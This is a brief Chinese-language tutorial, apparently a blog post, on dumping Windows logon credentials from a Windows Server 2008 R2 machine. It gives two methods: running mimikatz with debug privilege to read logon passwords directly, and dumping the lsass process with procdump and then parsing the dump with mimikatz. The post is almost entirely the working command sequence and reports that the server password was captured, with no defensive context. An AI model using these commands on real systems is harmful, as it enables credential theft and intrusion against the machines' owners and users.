mimikatz抓密码
目标机 windows server 2008 R2
第一种方法:
cmd下运行mimikatz.exe,然后依次输入下面命令
privilege::debug
sekurlsa::logonpasswords
成功抓到服务器密码
![](https://upload-images.jianshu.io/upload_images/14656221-e58f6eef7700cf38.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/14656221-9eee7840c5607e84.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
第二种方法:
下载个procdump,https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump,然后
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp"
sekurlsa::logonpasswords
![](https://upload-images.jianshu.io/upload_images/14656221-78303768483c4220.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)